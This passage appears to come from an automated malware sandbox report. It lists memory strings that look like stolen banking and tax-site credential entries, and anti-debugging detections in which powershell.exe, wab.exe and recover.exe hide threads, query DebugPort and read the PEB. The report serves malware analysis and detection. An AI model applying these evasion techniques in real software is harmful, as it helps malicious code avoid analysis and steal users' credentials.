Sharing ServiceWork FoldersParental ControlsPortable Device Enumerator ServiceWindows Push Notifications System ServiceSecurity CenterWindows SearchWindows UpdateWWAN AutoConfigXbox Live Auth ManagerXbox Live Game SaveXbox Accessory Management ServiceXbox Live Networking ServiceAgent Activation Runtime_27019GameDVR and Broadcast User Service_27019Bluetooth User Support Service_27019CaptureService_27019Clipboard User Service_27019Connected Devices Platform User Service_27019ConsentUX_27019CredentialEnrollmentManagerUserSvc_27019DeviceAssociationBroker_27019DevicePicker_27019DevicesFlow_27019MessagingService_27019Sync Host_27019Contact Data_27019PrintWorkflow_27019Udk User Service_27019User Data Storage_27019User Data Access_27019Windows Push Notifications User Service_27019-Run Servi
Source: 424iy8O9X8.13.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 424iy8O9X8.13.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 424iy8O9X8.13.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: firefox.exe, 00000012.00000002.3264539600.00000271040CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllllQ
Source: 424iy8O9X8.13.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 424iy8O9X8.13.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDFE20 rdtsc 10_2_1FDDFE20
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_029ED8B8 LdrInitializeThunk,LdrInitializeThunk, 5_2_029ED8B8
Contains functionality to read the PEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE74FE7 mov eax, dword ptr fs:[00000030h] 10_2_1FE74FE7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9EFD8 mov eax, dword ptr fs:[00000030h] 10_2_1FD9EFD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9EFD8 mov eax, dword ptr fs:[00000030h] 10_2_1FD9EFD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9EFD8 mov eax, dword ptr fs:[00000030h] 10_2_1FD9EFD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9BFD0 mov eax, dword ptr fs:[00000030h] 10_2_1FD9BFD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD1FCD mov eax, dword ptr fs:[00000030h] 10_2_1FDD1FCD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD1FCD mov eax, dword ptr fs:[00000030h] 10_2_1FDD1FCD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD1FCD mov eax, dword ptr fs:[00000030h] 10_2_1FDD1FCD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE56FF7 mov eax, dword ptr fs:[00000030h] 10_2_1FE56FF7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA2FC8 mov eax, dword ptr fs:[00000030h] 10_2_1FDA2FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA2FC8 mov eax, dword ptr fs:[00000030h] 10_2_1FDA2FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA2FC8 mov eax, dword ptr fs:[00000030h] 10_2_1FDA2FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA2FC8 mov eax, dword ptr fs:[00000030h] 10_2_1FDA2FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA3FC2 mov eax, dword ptr fs:[00000030h] 10_2_1FDA3FC2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5BFC0 mov ecx, dword ptr fs:[00000030h] 10_2_1FE5BFC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5BFC0 mov eax, dword ptr fs:[00000030h] 10_2_1FE5BFC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE0FF6 mov eax, dword ptr fs:[00000030h] 10_2_1FDE0FF6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE0FF6 mov eax, dword ptr fs:[00000030h] 10_2_1FDE0FF6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE0FF6 mov eax, dword ptr fs:[00000030h] 10_2_1FDE0FF6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE0FF6 mov eax, dword ptr fs:[00000030h] 10_2_1FDE0FF6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDBFEC mov eax, dword ptr fs:[00000030h] 10_2_1FDDBFEC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDBFEC mov eax, dword ptr fs:[00000030h] 10_2_1FDDBFEC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDBFEC mov eax, dword ptr fs:[00000030h] 10_2_1FDDBFEC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE23FD7 mov eax, dword ptr fs:[00000030h] 10_2_1FE23FD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDBCFE0 mov eax, dword ptr fs:[00000030h] 10_2_1FDBCFE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDBCFE0 mov eax, dword ptr fs:[00000030h] 10_2_1FDBCFE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD2F98 mov eax, dword ptr fs:[00000030h] 10_2_1FDD2F98
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD2F98 mov eax, dword ptr fs:[00000030h] 10_2_1FDD2F98
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB1F92 mov ecx, dword ptr fs:[00000030h] 10_2_1FDB1F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB1F92 mov ecx, dword ptr fs:[00000030h] 10_2_1FDB1F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB1F92 mov eax, dword ptr fs:[00000030h] 10_2_1FDB1F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB1F92 mov ecx, dword ptr fs:[00000030h] 10_2_1FDB1F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB1F92 mov ecx, dword ptr fs:[00000030h] 10_2_1FDB1F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB1F92 mov eax, dword ptr fs:[00000030h] 10_2_1FDB1F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB1F92 mov ecx, dword ptr fs:[00000030h] 10_2_1FDB1F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB1F92 mov ecx, dword ptr fs:[00000030h] 10_2_1FDB1F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB1F92 mov eax, dword ptr fs:[00000030h] 10_2_1FDB1F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB1F92 mov ecx, dword ptr fs:[00000030h] 10_2_1FDB1F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB1F92 mov ecx, dword ptr fs:[00000030h] 10_2_1FDB1F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB1F92 mov eax, dword ptr fs:[00000030h] 10_2_1FDB1F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9FF90 mov edi, dword ptr fs:[00000030h] 10_2_1FD9FF90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDCF80 mov eax, dword ptr fs:[00000030h] 10_2_1FDDCF80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDE1FB8 mov eax, dword ptr fs:[00000030h] 10_2_1FDE1FB8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDBFB0 mov eax, dword ptr fs:[00000030h] 10_2_1FDDBFB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9CF50 mov eax, dword ptr fs:[00000030h] 10_2_1FD9CF50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9CF50 mov eax, dword ptr fs:[00000030h] 10_2_1FD9CF50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9CF50 mov eax, dword ptr fs:[00000030h] 10_2_1FD9CF50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9CF50 mov eax, dword ptr fs:[00000030h] 10_2_1FD9CF50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9CF50 mov eax, dword ptr fs:[00000030h] 10_2_1FD9CF50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9CF50 mov eax, dword ptr fs:[00000030h] 10_2_1FD9CF50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA1F50 mov eax, dword ptr fs:[00000030h] 10_2_1FDA1F50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD7F51 mov eax, dword ptr fs:[00000030h] 10_2_1FDD7F51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDCF50 mov eax, dword ptr fs:[00000030h] 10_2_1FDDCF50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE74F68 mov eax, dword ptr fs:[00000030h] 10_2_1FE74F68
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE24F40 mov eax, dword ptr fs:[00000030h] 10_2_1FE24F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE24F40 mov eax, dword ptr fs:[00000030h] 10_2_1FE24F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE24F40 mov eax, dword ptr fs:[00000030h] 10_2_1FE24F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE24F40 mov eax, dword ptr fs:[00000030h] 10_2_1FE24F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE1FF42 mov eax, dword ptr fs:[00000030h] 10_2_1FE1FF42
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCAF69 mov eax, dword ptr fs:[00000030h] 10_2_1FDCAF69
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCAF69 mov eax, dword ptr fs:[00000030h] 10_2_1FDCAF69
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCBF60 mov eax, dword ptr fs:[00000030h] 10_2_1FDCBF60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDCF1F mov eax, dword ptr fs:[00000030h] 10_2_1FDDCF1F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA2F12 mov eax, dword ptr fs:[00000030h] 10_2_1FDA2F12
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5DF2F mov eax, dword ptr fs:[00000030h] 10_2_1FE5DF2F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE47F3E mov eax, dword ptr fs:[00000030h] 10_2_1FE47F3E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE56F00 mov eax, dword ptr fs:[00000030h] 10_2_1FE56F00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE21F13 mov eax, dword ptr fs:[00000030h] 10_2_1FE21F13
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE2DF10 mov eax, dword ptr fs:[00000030h] 10_2_1FE2DF10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCEF28 mov eax, dword ptr fs:[00000030h] 10_2_1FDCEF28
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6BEE6 mov eax, dword ptr fs:[00000030h] 10_2_1FE6BEE6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6BEE6 mov eax, dword ptr fs:[00000030h] 10_2_1FE6BEE6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6BEE6 mov eax, dword ptr fs:[00000030h] 10_2_1FE6BEE6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6BEE6 mov eax, dword ptr fs:[00000030h] 10_2_1FE6BEE6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9BEC0 mov eax, dword ptr fs:[00000030h] 10_2_1FD9BEC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9BEC0 mov eax, dword ptr fs:[00000030h] 10_2_1FD9BEC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABEC0 mov eax, dword ptr fs:[00000030h] 10_2_1FDABEC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABEC0 mov eax, dword ptr fs:[00000030h] 10_2_1FDABEC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABEC0 mov eax, dword ptr fs:[00000030h] 10_2_1FDABEC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABEC0 mov eax, dword ptr fs:[00000030h] 10_2_1FDABEC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABEC0 mov eax, dword ptr fs:[00000030h] 10_2_1FDABEC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABEC0 mov eax, dword ptr fs:[00000030h] 10_2_1FDABEC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABEC0 mov eax, dword ptr fs:[00000030h] 10_2_1FDABEC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDABEC0 mov eax, dword ptr fs:[00000030h] 10_2_1FDABEC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCFEC0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCFEC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE2FEC5 mov eax, dword ptr fs:[00000030h] 10_2_1FE2FEC5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD8EF5 mov eax, dword ptr fs:[00000030h] 10_2_1FDD8EF5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA3EF4 mov eax, dword ptr fs:[00000030h] 10_2_1FDA3EF4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA3EF4 mov eax, dword ptr fs:[00000030h] 10_2_1FDA3EF4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA3EF4 mov eax, dword ptr fs:[00000030h] 10_2_1FDA3EF4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD3EEB mov ecx, dword ptr fs:[00000030h] 10_2_1FDD3EEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD3EEB mov eax, dword ptr fs:[00000030h] 10_2_1FDD3EEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD3EEB mov eax, dword ptr fs:[00000030h] 10_2_1FDD3EEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6EE0 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6EE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6EE0 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6EE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6EE0 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6EE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6EE0 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6EE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA3EE1 mov eax, dword ptr fs:[00000030h] 10_2_1FDA3EE1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD2E9C mov eax, dword ptr fs:[00000030h] 10_2_1FDD2E9C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD2E9C mov ecx, dword ptr fs:[00000030h] 10_2_1FDD2E9C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE2CEA0 mov eax, dword ptr fs:[00000030h] 10_2_1FE2CEA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE2CEA0 mov eax, dword ptr fs:[00000030h] 10_2_1FE2CEA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE2CEA0 mov eax, dword ptr fs:[00000030h] 10_2_1FE2CEA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE2DEAA mov eax, dword ptr fs:[00000030h] 10_2_1FE2DEAA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9AE90 mov eax, dword ptr fs:[00000030h] 10_2_1FD9AE90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9AE90 mov eax, dword ptr fs:[00000030h] 10_2_1FD9AE90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9AE90 mov eax, dword ptr fs:[00000030h] 10_2_1FD9AE90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA7E96 mov eax, dword ptr fs:[00000030h] 10_2_1FDA7E96
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDD3E8F mov eax, dword ptr fs:[00000030h] 10_2_1FDD3E8F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE3AEB0 mov eax, dword ptr fs:[00000030h] 10_2_1FE3AEB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE3AEB0 mov eax, dword ptr fs:[00000030h] 10_2_1FE3AEB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5DEB0 mov eax, dword ptr fs:[00000030h] 10_2_1FE5DEB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9FEA0 mov eax, dword ptr fs:[00000030h] 10_2_1FD9FEA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE2DE9B mov eax, dword ptr fs:[00000030h] 10_2_1FE2DE9B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9DEA5 mov eax, dword ptr fs:[00000030h] 10_2_1FD9DEA5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9DEA5 mov ecx, dword ptr fs:[00000030h] 10_2_1FD9DEA5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9EE5A mov eax, dword ptr fs:[00000030h] 10_2_1FD9EE5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDBE51 mov eax, dword ptr fs:[00000030h] 10_2_1FDDBE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDDBE51 mov eax, dword ptr fs:[00000030h] 10_2_1FDDBE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDB5E40 mov eax, dword ptr fs:[00000030h] 10_2_1FDB5E40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE20E7F mov eax, dword ptr fs:[00000030h] 10_2_1FE20E7F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE20E7F mov eax, dword ptr fs:[00000030h] 10_2_1FE20E7F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE20E7F mov eax, dword ptr fs:[00000030h] 10_2_1FE20E7F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9BE78 mov ecx, dword ptr fs:[00000030h] 10_2_1FD9BE78
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5DE46 mov eax, dword ptr fs:[00000030h] 10_2_1FE5DE46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE72E4F mov eax, dword ptr fs:[00000030h] 10_2_1FE72E4F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE72E4F mov eax, dword ptr fs:[00000030h] 10_2_1FE72E4F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA6E71 mov eax, dword ptr fs:[00000030h] 10_2_1FDA6E71
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE49E56 mov ecx, dword ptr fs:[00000030h] 10_2_1FE49E56
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD98E1D mov eax, dword ptr fs:[00000030h] 10_2_1FD98E1D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9DE10 mov eax, dword ptr fs:[00000030h] 10_2_1FD9DE10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCAE00 mov eax, dword ptr fs:[00000030h] 10_2_1FDCAE00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCAE00 mov eax, dword ptr fs:[00000030h] 10_2_1FDCAE00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCAE00 mov eax, dword ptr fs:[00000030h] 10_2_1FDCAE00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCAE00 mov ecx, dword ptr fs:[00000030h] 10_2_1FDCAE00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCAE00 mov eax, dword ptr fs:[00000030h] 10_2_1FDCAE00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCAE00 mov eax, dword ptr fs:[00000030h] 10_2_1FDCAE00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCAE00 mov eax, dword ptr fs:[00000030h] 10_2_1FDCAE00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCAE00 mov eax, dword ptr fs:[00000030h] 10_2_1FDCAE00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCAE00 mov eax, dword ptr fs:[00000030h] 10_2_1FDCAE00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCAE00 mov eax, dword ptr fs:[00000030h] 10_2_1FDCAE00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA1E30 mov eax, dword ptr fs:[00000030h] 10_2_1FDA1E30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA1E30 mov eax, dword ptr fs:[00000030h] 10_2_1FDA1E30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDBDE2D mov eax, dword ptr fs:[00000030h] 10_2_1FDBDE2D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDBDE2D mov eax, dword ptr fs:[00000030h] 10_2_1FDBDE2D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDBDE2D mov eax, dword ptr fs:[00000030h] 10_2_1FDBDE2D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA3DD0 mov eax, dword ptr fs:[00000030h] 10_2_1FDA3DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDA3DD0 mov eax, dword ptr fs:[00000030h] 10_2_1FDA3DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCEDD3 mov eax, dword ptr fs:[00000030h] 10_2_1FDCEDD3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCEDD3 mov eax, dword ptr fs:[00000030h] 10_2_1FDCEDD3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE6DDC6 mov eax, dword ptr fs:[00000030h] 10_2_1FE6DDC6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE2DDC0 mov eax, dword ptr fs:[00000030h] 10_2_1FE2DDC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE5DDC7 mov eax, dword ptr fs:[00000030h] 10_2_1FE5DDC7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCCDF0 mov eax, dword ptr fs:[00000030h] 10_2_1FDCCDF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDCCDF0 mov ecx, dword ptr fs:[00000030h] 10_2_1FDCCDF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD96DF6 mov eax, dword ptr fs:[00000030h] 10_2_1FD96DF6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9CDEA mov eax, dword ptr fs:[00000030h] 10_2_1FD9CDEA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9CDEA mov eax, dword ptr fs:[00000030h] 10_2_1FD9CDEA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE24DD7 mov eax, dword ptr fs:[00000030h] 10_2_1FE24DD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE24DD7 mov eax, dword ptr fs:[00000030h] 10_2_1FE24DD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAADE0 mov eax, dword ptr fs:[00000030h] 10_2_1FDAADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAADE0 mov eax, dword ptr fs:[00000030h] 10_2_1FDAADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAADE0 mov eax, dword ptr fs:[00000030h] 10_2_1FDAADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAADE0 mov eax, dword ptr fs:[00000030h] 10_2_1FDAADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAADE0 mov eax, dword ptr fs:[00000030h] 10_2_1FDAADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDAADE0 mov eax, dword ptr fs:[00000030h] 10_2_1FDAADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC0DE1 mov eax, dword ptr fs:[00000030h] 10_2_1FDC0DE1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE68DAE mov eax, dword ptr fs:[00000030h] 10_2_1FE68DAE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE68DAE mov eax, dword ptr fs:[00000030h] 10_2_1FE68DAE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE74DAD mov eax, dword ptr fs:[00000030h] 10_2_1FE74DAD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD99D96 mov eax, dword ptr fs:[00000030h] 10_2_1FD99D96
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD99D96 mov eax, dword ptr fs:[00000030h] 10_2_1FD99D96
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD99D96 mov ecx, dword ptr fs:[00000030h] 10_2_1FD99D96
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FE2DDB1 mov eax, dword ptr fs:[00000030h] 10_2_1FE2DDB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FD9FD80 mov eax, dword ptr fs:[00000030h] 10_2_1FD9FD80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC8DBF mov eax, dword ptr fs:[00000030h] 10_2_1FDC8DBF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDC8DBF mov eax, dword ptr fs:[00000030h] 10_2_1FDC8DBF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_1FDBDDB1 mov eax, dword ptr fs:[00000030h] 10_2_1FDBDDB1
